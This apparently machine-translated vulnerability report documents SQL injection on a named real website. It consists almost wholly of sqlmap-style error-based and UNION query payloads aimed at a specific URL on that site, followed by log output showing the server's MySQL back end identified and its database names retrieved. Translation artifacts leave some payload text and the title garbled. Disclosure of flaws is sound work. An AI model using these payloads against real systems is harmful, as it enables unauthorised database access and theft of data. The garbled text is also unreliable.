A static injection (error reported) on a giant network site)
A static injection (error reported) on a giant network site)
Http://act.vg.ztgame.com/video/public/show/13
---
Parameter: #1 * (URI)
Type: error-based
Title: MySQL & gt; = 5.0 AND error-based-WHERE, HAVING, order by or group by clause
Payload: http://act.vg.ztgame.com: 80/video/public/show/13 'AND (SELECT 4119 FROM (select count (*), CONCAT (0x716a6a7071, (SELECT (ELT (4119 = 4119,1), 0x71786a6a71, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) and 'wrqt '= 'wrqt
Type: UNION query
Title: MySQL UNION query (NULL)-10 columns
Payload: http://act.vg.ztgame.com: 80/video/public/show/-6466 'Union all select null, CONCAT (0x716a6a7071, 0x474a69756d6e6774526d, 0x71786a6a71), NULL, NULL, NULL, NULL #
---
[08:01:15] [INFO] the back-end DBMS is MySQL
Web application technology: Apache
Back-end DBMS: MySQL 5.0
[08:01:15] [INFO] fetching database names
[08:01:15] [INFO] the SQL query used returns 3 entries
[08:01:18] [INFO] retrieved: information_schema
[08:01:18] [INFO] retrieved: act_vg
[08:01:18] [INFO] retrieved: test
Available databases [3]:
[*] Act_vg
[*] Information_schema
[*] Test